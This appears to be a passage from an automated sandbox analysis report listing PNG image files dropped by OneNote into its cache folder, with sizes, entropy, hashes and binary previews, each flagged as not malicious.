SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
